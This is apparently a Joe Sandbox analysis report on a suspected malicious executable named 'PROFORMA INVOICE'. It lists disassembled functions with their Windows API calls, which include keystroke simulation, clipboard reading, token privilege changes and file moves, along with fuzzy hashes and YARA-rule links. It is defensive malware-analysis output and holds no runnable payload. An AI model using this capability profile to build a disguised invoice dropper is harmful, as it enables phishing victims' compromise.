Opcode Fuzzy Hash: 7bca558314b30c0366131b8b5937b4ce79c071bb15e0f8d2e9cafc549862a601
Instruction Fuzzy Hash: BB416C74908601CFDB24DF18C484B1ABBE1BF44314F19899DE99A4B362C776E845EF43

Function 00F641A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F64214: FreeLibrary.KERNEL32(00000000,?), ref: 00F64247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00F639FE,?,00000001), ref: 00F641DB

Part of subcall function 00F64291: FreeLibrary.KERNEL32(00000000), ref: 00F642C4

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: 6406472d54b3372e52174b99af4fc4a9b67afd5a6da3f2c309dbd6159fd3e649
Instruction ID: b275e1d60b330d13024ad0ed7bd8983acd38a43ae82756b4c1d39f44cb7b529f
Opcode Fuzzy Hash: 6406472d54b3372e52174b99af4fc4a9b67afd5a6da3f2c309dbd6159fd3e649
Instruction Fuzzy Hash: 8B11A771600205ABDB14FF74DC16F9E77A99F40704F208429F5A6EB1D1DE78AA40BB60

Function 00FD9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00FD9B51

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 8250edebc54e88c61a874cf297b78771f8d3bd825ad70d28e18f00fb88deb56c
Instruction ID: 5a2c73daca3ed218fd4fa10a7b84e58821db183e67fb8f49ef8fff168367c0c0
Opcode Fuzzy Hash: 8250edebc54e88c61a874cf297b78771f8d3bd825ad70d28e18f00fb88deb56c
Instruction Fuzzy Hash: 1A212774508705CFDB24DF28C844B1ABBE1BF84304F19896DE99A4B262DB36E845EF53

Function 00F8AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 00F8AFC0

Part of subcall function 00F87BDA: __getptd_noexit.LIBCMT ref: 00F87BDA

Part of subcall function 00F87C0E: __getptd_noexit.LIBCMT ref: 00F87C0E

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: 6f101fec552f164be1eb2b92b0796951cdb10985dd0429315d15d9edde376605
Instruction ID: efb393431052f9588962d364d951c7582c46be9c093be04c22c73f62a5437fe9
Opcode Fuzzy Hash: 6f101fec552f164be1eb2b92b0796951cdb10985dd0429315d15d9edde376605
Instruction Fuzzy Hash: C5118F729096009FDB267FA4CC427DD3A61AF82336F264240E4745F1E6CBBD9D01BBA1

Function 00F639DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
Instruction ID: dd9ffce1a34e7f933fad2da5bfd53efca1ff53ff9cf09a9955efba0d2384dd96
Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
Instruction Fuzzy Hash: 6C01867550010AAECF05EFA4CC918EEBB74AF21304F108126B52197195EA34AA49EB60

Function 00F82AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00F82AED

Part of subcall function 00F87C0E: __getptd_noexit.LIBCMT ref: 00F87C0E

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: f12e1751ab09b1a74b5c39786b5fd3fe4027060b12950bd1a73bf8061c4bb62e
Instruction ID: 3f96f2e72e7d641d1a6a28a3df2ffc2da3dcf2d6f1c539193ca5e74ae2b865f8
Opcode Fuzzy Hash: f12e1751ab09b1a74b5c39786b5fd3fe4027060b12950bd1a73bf8061c4bb62e
Instruction Fuzzy Hash: 72F0CD31900205AADF66BF648C023DF3AA5BF40320F158419F8109B1A1C7BCAA52FB41

Function 00F64252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,00F639FE,?,00000001), ref: 00F64286

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 24768e9f9a3992249cd757054402a1f336cd289ff4315858d7426a8f9cdd3f86
Instruction ID: 98ef15c6921f3c577996ed5ba92f23e23da79209aee6bc2908e7259d81e6bc57
Opcode Fuzzy Hash: 24768e9f9a3992249cd757054402a1f336cd289ff4315858d7426a8f9cdd3f86
Instruction Fuzzy Hash: 42F039B1905702CFCB34AF64D8A0856BBE4BF053253348A3EF1D686A20C732A844FF50

Function 00F640A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F640C6

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 108ec58d2ef0eb4a8628e0ab641d6dac645c91630ef8e5bfec1f8ba689f01e5f
Instruction ID: 2b31902aabe1dcc55caab507fee18f1c6522879ecac418f7a3f7b581139e249b
Opcode Fuzzy Hash: 108ec58d2ef0eb4a8628e0ab641d6dac645c91630ef8e5bfec1f8ba689f01e5f
Instruction Fuzzy Hash: ACE0CD365001245BC711A654CC46FEA779DDF88690F050075F905D7244DA689D81A690

Function 017DCF20 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 017DCF31

Memory Dump Source

Source File: 00000000.00000002.1705514040.00000000017DA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17da000_PROFORMA INVOICE.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 5b85b7a584815306666d2206f7502e45b3b03d6575233079a2a5e7afbb94b51f
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 5FE0BF7594410D9FDB00EFA8D54969E7BB4EF04301F1001A5FD0192281D63099508A62

Non-executed Functions

Function 00FCF7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00F7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F7B35F

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00FCF87D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00FCF8DC
GetWindowLongW.USER32(?,000000F0), ref: 00FCF919
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FCF940
SendMessageW.USER32 ref: 00FCF966
_wcsncpy.LIBCMT ref: 00FCF9D2
GetKeyState.USER32(00000011), ref: 00FCF9F3
GetKeyState.USER32(00000009), ref: 00FCFA00
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00FCFA16
GetKeyState.USER32(00000010), ref: 00FCFA20
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FCFA4F
SendMessageW.USER32 ref: 00FCFA72
SendMessageW.USER32(?,00001030,?,00FCE059), ref: 00FCFB6F
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00FCFB85
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00FCFB96
SetCapture.USER32(?), ref: 00FCFB9F
ClientToScreen.USER32(?,?), ref: 00FCFC03
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00FCFC0F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00FCFC29
ReleaseCapture.USER32 ref: 00FCFC34
GetCursorPos.USER32(?), ref: 00FCFC69
ScreenToClient.USER32(?,?), ref: 00FCFC76
SendMessageW.USER32(?,00001012,00000000,?), ref: 00FCFCD8
SendMessageW.USER32 ref: 00FCFD02
SendMessageW.USER32(?,00001111,00000000,?), ref: 00FCFD41
SendMessageW.USER32 ref: 00FCFD6C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00FCFD84
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00FCFD8F
GetCursorPos.USER32(?), ref: 00FCFDB0
ScreenToClient.USER32(?,?), ref: 00FCFDBD
GetParent.USER32(?), ref: 00FCFDD9
SendMessageW.USER32(?,00001012,00000000,?), ref: 00FCFE3F
SendMessageW.USER32 ref: 00FCFE6F
ClientToScreen.USER32(?,?), ref: 00FCFEC5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00FCFEF1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00FCFF19
SendMessageW.USER32 ref: 00FCFF3C
ClientToScreen.USER32(?,?), ref: 00FCFF86
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00FCFFB6
GetWindowLongW.USER32(?,000000F0), ref: 00FD004B

Strings

@GUI_DRAGID, xrefs: 00FCFBCC
F, xrefs: 00FCFF42

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 2516578528-4164748364
Opcode ID: 04a4b96cb0f561cbf9a7c242cad10aa2b94ec96c3020e81eb80626cc9157a224
Instruction ID: 3330058183568922d3d77a6f33a3c0958690f59a64eac1371b1192f5fc56df6b
Opcode Fuzzy Hash: 04a4b96cb0f561cbf9a7c242cad10aa2b94ec96c3020e81eb80626cc9157a224
Instruction Fuzzy Hash: A3329D74A04246EFDB20CF24C985FAABBA6FF49364F14062EF595872A1C731DC48EB51

Function 00FCAACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00FCB1CD

Strings

%d/%02d/%02d, xrefs: 00FCAEFC

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: cac0984e07c340abf37c734552ccd849b4f774dffa071ca22d7f71d9162dd941
Instruction ID: 387ba51a28cab6ee8390ea673a004027fa5868bc0b06c2d8ea4985f6fb7325f3
Opcode Fuzzy Hash: cac0984e07c340abf37c734552ccd849b4f774dffa071ca22d7f71d9162dd941
Instruction Fuzzy Hash: 6612EE7190024AABEB258F64CD8AFAE7BB8FF45324F14411DF91ADB2D0DB749901EB11

Function 00F7EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 00F7EB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FD3AEA
IsIconic.USER32(000000FF), ref: 00FD3AF3
ShowWindow.USER32(000000FF,00000009), ref: 00FD3B00
SetForegroundWindow.USER32(000000FF), ref: 00FD3B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FD3B20
GetCurrentThreadId.KERNEL32 ref: 00FD3B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00FD3B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00FD3B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00FD3B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 00FD3B54
SetForegroundWindow.USER32(000000FF), ref: 00FD3B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FD3B6C
keybd_event.USER32(00000012,00000000), ref: 00FD3B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FD3B81
keybd_event.USER32(00000012,00000000), ref: 00FD3B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FD3B8F
keybd_event.USER32(00000012,00000000), ref: 00FD3B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FD3B9E
keybd_event.USER32(00000012,00000000), ref: 00FD3BA3
SetForegroundWindow.USER32(000000FF), ref: 00FD3BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 00FD3BCD

Strings

Shell_TrayWnd, xrefs: 00FD3AE5

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 7269fc3d10f4bea64cd3f97db041e2001f2f81cba0147051bd57a2c132302fbd
Instruction ID: 023fd0fc8e86a73d096744a70fda8c8d889fa155850bfd308ba71df6105172b9
Opcode Fuzzy Hash: 7269fc3d10f4bea64cd3f97db041e2001f2f81cba0147051bd57a2c132302fbd
Instruction Fuzzy Hash: A3318372A4035C7FEB205B658C89F7F7E6DEB84BA0F144016FA05EE2D0D6B15D00BAA1

Function 00F9ACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 00F9B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F9B180
Part of subcall function 00F9B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F9B1AD
Part of subcall function 00F9B134: GetLastError.KERNEL32 ref: 00F9B1BA

_memset.LIBCMT ref: 00F9AD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F9AD5A
CloseHandle.KERNEL32(?), ref: 00F9AD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F9AD82
GetProcessWindowStation.USER32 ref: 00F9AD9B
SetProcessWindowStation.USER32(00000000), ref: 00F9ADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F9ADBF

Part of subcall function 00F9AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F9ACC0), ref: 00F9AB99
Part of subcall function 00F9AB84: CloseHandle.KERNEL32(?,?,00F9ACC0), ref: 00F9ABAB

Strings

, xrefs: 00F9AD17
default, xrefs: 00F9ADBA
winsta0, xrefs: 00F9AD7D

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: c89682e0ccfc49e6b14655a8292929473b17b02fa0a09d8695b6d79710ce26c3
Instruction ID: 4a34b9b39aeadf48421830577838bb2e6ba27a933fa22b44bed84a5263c23222
Opcode Fuzzy Hash: c89682e0ccfc49e6b14655a8292929473b17b02fa0a09d8695b6d79710ce26c3
Instruction Fuzzy Hash: A381AC71C0024DAFEF11EFA5CC89AEE7BB9EF04314F044119F814A6161DB358E54EBA2

Function 00FA60DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00FA6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FA5FA6,?), ref: 00FA6ED8

Part of subcall function 00FA6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FA5FA6,?), ref: 00FA6EF1

Part of subcall function 00FA725E: __wsplitpath.LIBCMT ref: 00FA727B
Part of subcall function 00FA725E: __wsplitpath.LIBCMT ref: 00FA728E

Part of subcall function 00FA72CB: GetFileAttributesW.KERNEL32(?,00FA6019), ref: 00FA72CC

_wcscat.LIBCMT ref: 00FA6149
_wcscat.LIBCMT ref: 00FA6167
__wsplitpath.LIBCMT ref: 00FA618E
FindFirstFileW.KERNEL32(?,?), ref: 00FA61A4
_wcscpy.LIBCMT ref: 00FA6209
_wcscat.LIBCMT ref: 00FA621C
_wcscat.LIBCMT ref: 00FA622F
lstrcmpiW.KERNEL32(?,?), ref: 00FA625D
DeleteFileW.KERNEL32(?), ref: 00FA626E
MoveFileW.KERNEL32(?,?), ref: 00FA6289
MoveFileW.KERNEL32(?,?), ref: 00FA6298
CopyFileW.KERNEL32(?,?,00000000), ref: 00FA62AD
DeleteFileW.KERNEL32(?), ref: 00FA62BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FA62E1
FindClose.KERNEL32(00000000), ref: 00FA62FD
FindClose.KERNEL32(00000000), ref: 00FA630B

Strings

\*.*, xrefs: 00FA6138, 00FA6147, 00FA6165

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: 255ddfe87191450dee2d7c0399d69188398790c1733eba7b6f31ec4669adc35e
Instruction ID: c489197f7435a4c40c20f306e05c4993e9e6725618234ac344d9afa292c89e15
Opcode Fuzzy Hash: 255ddfe87191450dee2d7c0399d69188398790c1733eba7b6f31ec4669adc35e
Instruction Fuzzy Hash: 1651F1B2C0815C6ACF21EB91CC85EEB77FCAF06310F0901E6E545E6141DE769749AFA4

Function 00FB6B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00FFDC00), ref: 00FB6B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 00FB6B44
GetClipboardData.USER32(0000000D), ref: 00FB6B4C
CloseClipboard.USER32 ref: 00FB6B58
GlobalLock.KERNEL32(00000000), ref: 00FB6B74
CloseClipboard.USER32 ref: 00FB6B7E
GlobalUnlock.KERNEL32(00000000), ref: 00FB6B93
IsClipboardFormatAvailable.USER32(00000001), ref: 00FB6BA0
GetClipboardData.USER32(00000001), ref: 00FB6BA8
GlobalLock.KERNEL32(00000000), ref: 00FB6BB5
GlobalUnlock.KERNEL32(00000000), ref: 00FB6BE9
CloseClipboard.USER32 ref: 00FB6CF6

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 18a65d34fb3c7729489bf9a9c2cfd4c8ab25373e50efd7507c2bda35ca588d33
Instruction ID: 02d2d9f47648965313627e6287ca6f69e1c134a05ffc9b8db0e73ce3e3f83f81
Opcode Fuzzy Hash: 18a65d34fb3c7729489bf9a9c2cfd4c8ab25373e50efd7507c2bda35ca588d33
Instruction Fuzzy Hash: 0251BF71200205ABD310EF65CD86FBE77B8AF94B11F004529F696DA1E1DF78D805BB62

Function 00FAF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00FAF62B
FindClose.KERNEL32(00000000), ref: 00FAF67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FAF6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FAF6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 00FAF6E2
__swprintf.LIBCMT ref: 00FAF72E
__swprintf.LIBCMT ref: 00FAF767
__swprintf.LIBCMT ref: 00FAF7BB

Part of subcall function 00F8172B: __woutput_l.LIBCMT ref: 00F81784

__swprintf.LIBCMT ref: 00FAF809
__swprintf.LIBCMT ref: 00FAF858
__swprintf.LIBCMT ref: 00FAF8A7
__swprintf.LIBCMT ref: 00FAF8F6

Strings

%02d, xrefs: 00FAF7B0, 00FAF7B9, 00FAF807, 00FAF856, 00FAF8A5, 00FAF8F4
%4d%02d%02d%02d%02d%02d, xrefs: 00FAF728
%4d, xrefs: 00FAF761

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
